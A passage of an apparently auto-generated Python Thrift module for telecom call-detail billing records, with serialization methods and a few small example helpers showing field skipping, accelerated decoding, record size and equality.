oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 14)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 15)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 16)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 17)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 18)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 19)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
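
# Hedged sketch: the read() loop above skips field ids it does not know,
# which is what gives these structs forward compatibility. Below, a frame
# carrying an extra field id 99 is parsed by CdrsDids without error: the
# unknown value is discarded and the known field survives.
def _example_skip_unknown_field():
    from thrift.transport import TTransport
    from thrift.protocol import TBinaryProtocol
    buf = TTransport.TMemoryBuffer()
    oprot = TBinaryProtocol.TBinaryProtocol(buf)
    oprot.writeStructBegin('CdrsDids')
    oprot.writeFieldBegin('future_field', TType.I64, 99)  # id 99: unknown here
    oprot.writeI64(42)
    oprot.writeFieldEnd()
    oprot.writeFieldBegin('i_did', TType.I64, 3)
    oprot.writeI64(7)
    oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
    rec = CdrsDids()
    rec.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(buf.getvalue())))
    assert rec.i_did == 7 and rec.i_cdrs_did is None
    return rec
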
class CdrsConnectionsDids(object):
"""
Attributes:
- i_cdrs_connections_did
- i_call
- i_did_authorization
- did
- incoming_did
- i_connection
- result
- cost
- duration
- billed_duration
- setup_time
- connect_time
- disconnect_time
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_connections_did', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_did_authorization', None, None, ), # 3
(4, TType.STRING, 'did', 'UTF8', None, ), # 4
(5, TType.STRING, 'incoming_did', 'UTF8', None, ), # 5
(6, TType.I64, 'i_connection', None, None, ), # 6
(7, TType.I32, 'result', None, None, ), # 7
(8, TType.DOUBLE, 'cost', None, None, ), # 8
(9, TType.DOUBLE, 'duration', None, None, ), # 9
(10, TType.DOUBLE, 'billed_duration', None, None, ), # 10
(11, TType.I64, 'setup_time', None, None, ), # 11
(12, TType.I64, 'connect_time', None, None, ), # 12
(13, TType.I64, 'disconnect_time', None, None, ), # 13
(14, TType.DOUBLE, 'price_1', None, None, ), # 14
(15, TType.DOUBLE, 'price_n', None, None, ), # 15
(16, TType.I32, 'interval_1', None, None, ), # 16
(17, TType.I32, 'interval_n', None, None, ), # 17
(18, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 18
(19, TType.DOUBLE, 'connect_fee', None, None, ), # 19
(20, TType.I32, 'free_seconds', None, None, ), # 20
(21, TType.I32, 'grace_period', None, None, ), # 21
)
def __init__(self, i_cdrs_connections_did=None, i_call=None, i_did_authorization=None, did=None, incoming_did=None, i_connection=None, result=None, cost=None, duration=None, billed_duration=None, setup_time=None, connect_time=None, disconnect_time=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None,):
self.i_cdrs_connections_did = i_cdrs_connections_did
self.i_call = i_call
self.i_did_authorization = i_did_authorization
self.did = did
self.incoming_did = incoming_did
self.i_connection = i_connection
self.result = result
self.cost = cost
self.duration = duration
self.billed_duration = billed_duration
self.setup_time = setup_time
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_connections_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_did_authorization = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.incoming_did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I32:
self.result = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 21:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsConnectionsDids')
if self.i_cdrs_connections_did is not None:
oprot.writeFieldBegin('i_cdrs_connections_did', TType.I64, 1)
oprot.writeI64(self.i_cdrs_connections_did)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_did_authorization is not None:
oprot.writeFieldBegin('i_did_authorization', TType.I64, 3)
oprot.writeI64(self.i_did_authorization)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 4)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.incoming_did is not None:
oprot.writeFieldBegin('incoming_did', TType.STRING, 5)
oprot.writeString(self.incoming_did.encode('utf-8') if sys.version_info[0] == 2 else self.incoming_did)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 6)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I32, 7)
oprot.writeI32(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 8)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 9)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 10)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 11)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 12)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 13)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 14)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 15)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 16)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 17)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 18)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 19)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 20)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 21)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
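
# Hedged sketch: when thrift's compiled `fastbinary` extension is available
# and the protocol is TBinaryProtocolAccelerated over a C-readable transport,
# read()/write() above short-circuit into the C codec; otherwise the
# pure-Python field loop runs. The wire format is identical either way, so
# this helper works with or without the extension.
def _example_accelerated_read(raw_bytes):
    from thrift.transport import TTransport
    from thrift.protocol import TBinaryProtocol
    trans = TTransport.TMemoryBuffer(raw_bytes)  # TMemoryBuffer is C-readable
    rec = CdrsConnectionsDids()
    rec.read(TBinaryProtocol.TBinaryProtocolAccelerated(trans))
    return rec
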
class Surcharges(object):
"""
Attributes:
- i_surcharge
- i_call
- cost
- i_surcharge_type
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_surcharge', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.DOUBLE, 'cost', None, None, ), # 3
(4, TType.I64, 'i_surcharge_type', None, None, ), # 4
)
def __init__(self, i_surcharge=None, i_call=None, cost=None, i_surcharge_type=None,):
self.i_surcharge = i_surcharge
self.i_call = i_call
self.cost = cost
self.i_surcharge_type = i_surcharge_type
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_surcharge = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_surcharge_type = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Surcharges')
if self.i_surcharge is not None:
oprot.writeFieldBegin('i_surcharge', TType.I64, 1)
oprot.writeI64(self.i_surcharge)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 3)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.i_surcharge_type is not None:
oprot.writeFieldBegin('i_surcharge_type', TType.I64, 4)
oprot.writeI64(self.i_surcharge_type)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
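
# Hedged sketch: write() only emits fields that are not None, so a sparse
# Surcharges record stays compact on the wire. With the plain binary protocol
# one I64 field costs 3 header bytes (type + field id) plus 8 payload bytes,
# and the struct ends with a 1-byte stop marker: 12 bytes for a single-field
# record.
def _example_sparse_surcharge_size():
    from thrift.transport import TTransport
    from thrift.protocol import TBinaryProtocol
    buf = TTransport.TMemoryBuffer()
    Surcharges(i_surcharge=5).write(TBinaryProtocol.TBinaryProtocol(buf))
    assert len(buf.getvalue()) == 12
    return buf.getvalue()
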
class Commissions(object):
"""
Attributes:
- i_commission
- i_account
- i_customer
- i_cdrs_customer
- commission_size
- setup_time
- i_call
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_commission', None, None, ), # 1
(2, TType.STRUCT, 'i_account', (NullInt64, NullInt64.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'i_customer', (NullInt64, NullInt64.thrift_spec), None, ), # 3
(4, TType.I64, 'i_cdrs_customer', None, None, ), # 4
(5, TType.DOUBLE, 'commission_size', None, None, ), # 5
(6, TType.I64, 'setup_time', None, None, ), # 6
(7, TType.I64, 'i_call', None, None, ), # 7
)
def __init__(self, i_commission=None, i_account=None, i_customer=None, i_cdrs_customer=None, commission_size=None, setup_time=None, i_call=None,):
self.i_commission = i_commission
self.i_account = i_account
self.i_customer = i_customer
self.i_cdrs_customer = i_cdrs_customer
self.commission_size = commission_size
self.setup_time = setup_time
self.i_call = i_call
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_commission = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.i_account = NullInt64()
self.i_account.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i_customer = NullInt64()
self.i_customer.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_cdrs_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.commission_size = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Commissions')
if self.i_commission is not None:
oprot.writeFieldBegin('i_commission', TType.I64, 1)
oprot.writeI64(self.i_commission)
oprot.writeFieldEnd()
if self.i_account is not None:
oprot.writeFieldBegin('i_account', TType.STRUCT, 2)
self.i_account.write(oprot)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.STRUCT, 3)
self.i_customer.write(oprot)
oprot.writeFieldEnd()
if self.i_cdrs_customer is not None:
oprot.writeFieldBegin('i_cdrs_customer', TType.I64, 4)
oprot.writeI64(self.i_cdrs_customer)
oprot.writeFieldEnd()
if self.commission_size is not None:
oprot.writeFieldBegin('commission_size', TType.DOUBLE, 5)
oprot.writeDouble(self.commission_size)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 6)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 7)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
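
# Hedged sketch: the generated __eq__/__ne__ give these records value
# semantics -- two Commissions rows with identical attribute dicts compare
# equal regardless of object identity -- and __repr__ prints every attribute,
# which is convenient when diffing rated calls in logs.
def _example_commission_equality():
    a = Commissions(i_commission=1, i_cdrs_customer=4, commission_size=0.02)
    b = Commissions(i_commission=1, i_cdrs_customer=4, commission_size=0.02)
    assert a == b and not (a != b)
    return repr(a)  # e.g. "Commissions(i_commission=1, ...)"
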
class CallsSdp(object):
"""
Attributes:
- i_calls_sdp
- i_call
- i_cdrs_connection
- time_stamp
- sdp
- sip_msg_type
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_calls_sdp', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.STRUCT, 'i_cdrs_connection', (NullInt64, NullInt64.thrift_spec), None, ), # 3
(4, TType.STRUCT, 'time_stamp', (UnixTime, UnixTime.thrift_spec), None, ), # 4
(5, TType.STRING, 'sdp', 'UTF8', None, ), # 5
(6, TType.STRING, 'sip_msg_type', 'UTF8', None, ), # 6
)
def __init__(self, i_calls_sdp=None, i_call=None, i_cdrs_connection=None, time_stamp=None, sdp=None, sip_msg_type=None,):
self.i_calls_sdp = i_calls_sdp
self.i_call = i_call
self.i_cdrs_connection = i_cdrs_connection
self.time_stamp = time_stamp
self.sdp = sdp
self.sip_msg_type = sip_msg_type
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_calls_sdp = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.i_cdrs_connection = NullInt64()
self.i_cdrs_connection.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.time_stamp = UnixTime()
self.time_stamp.read(iprot)
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.sdp = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.sip_msg_type = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CallsSdp')
if self.i_calls_sdp is not None:
oprot.writeFieldBegin('i_calls_sdp', TType.I64, 1)
oprot.writeI64(self.i_calls_sdp)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_cdrs_connection is not None:
oprot.writeFieldBegin('i_cdrs_connection', TType.STRUCT, 3)
self.i_cdrs_connection.write(oprot)
oprot.writeFieldEnd()
if self.time_stamp is not None:
oprot.writeFieldBegin('time_stamp', TType.STRUCT, 4)
self.time_stamp.write(oprot)
oprot.writeFieldEnd()
if self.sdp is not None:
oprot.writeFieldBegin('sdp', TType.STRING, 5)
oprot.writeString(self.sdp.encode('utf-8') if sys.version_info[0] == 2 else self.sdp)
oprot.writeFieldEnd()
if self.sip_msg_type is not None:
oprot.writeFieldBegin('sip_msg_type', TType.STRING, 6)
oprot.writeString(self.sip_msg_type.encode('utf-8') if sys.version_info[0] == 2 else self.sip_msg_type)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
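
# Hedged sketch: CallsSdp pairs a raw SDP body with the SIP message type that
# carried it and a UnixTime wrapper for the capture instant. The SDP text
# below is illustrative only; UnixTime is constructed empty, the same way
# read() does, since its internal fields are defined earlier in this module.
def _example_calls_sdp():
    rec = CallsSdp(i_calls_sdp=1, i_call=2,
                   sdp="v=0\r\no=- 0 0 IN IP4 192.0.2.1\r\ns=-\r\n",
                   sip_msg_type='INVITE')
    rec.time_stamp = UnixTime()
    return rec
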
class CdrsCustomersDids(object):
"""
Attributes:
- i_cdrs_customers_did
- i_call
- i_customer
- i_did
- did
- result
- cost
- duration
- billed_duration
- setup_time
- connect_time
- disconnect_time
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_customers_did', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_customer', None, None, ), # 3
(4, TType.I64, 'i_did', None, None, ), # 4
(5, TType.STRING, 'did', 'UTF8', None, ), # 5
(6, TType.I32, 'result', None, None, ), # 6
(7, TType.DOUBLE, 'cost', None, None, ), # 7
(8, TType.DOUBLE, 'duration', None, None, ), # 8
(9, TType.DOUBLE, 'billed_duration', None, None, ), # 9
(10, TType.I64, 'setup_time', None, None, ), # 10
(11, TType.I64, 'connect_time', None, None, ), # 11
(12, TType.I64, 'disconnect_time', None, None, ), # 12
(13, TType.DOUBLE, 'price_1', None, None, ), # 13
(14, TType.DOUBLE, 'price_n', None, None, ), # 14
(15, TType.I32, 'interval_1', None, None, ), # 15
(16, TType.I32, 'interval_n', None, None, ), # 16
(17, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 17
(18, TType.DOUBLE, 'connect_fee', None, None, ), # 18
(19, TType.I32, 'free_seconds', None, None, ), # 19
(20, TType.I32, 'grace_period', None, None, ), # 20
)
def __init__(self, i_cdrs_customers_did=None, i_call=None, i_customer=None, i_did=None, did=None, result=None, cost=None, duration=None, billed_duration=None, setup_time=None, connect_time=None, disconnect_time=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None,):
self.i_cdrs_customers_did = i_cdrs_customers_did
self.i_call = i_call
self.i_customer = i_customer
self.i_did = i_did
self.did = did
self.result = result
self.cost = cost
self.duration = duration
self.billed_duration = billed_duration
self.setup_time = setup_time
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_customers_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.i_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.result = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsCustomersDids')
if self.i_cdrs_customers_did is not None:
oprot.writeFieldBegin('i_cdrs_customers_did', TType.I64, 1)
oprot.writeI64(self.i_cdrs_customers_did)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 3)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.i_did is not None:
oprot.writeFieldBegin('i_did', TType.I64, 4)
oprot.writeI64(self.i_did)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 5)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I32, 6)
oprot.writeI32(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 7)
oprot.writeDouble(self.cost)
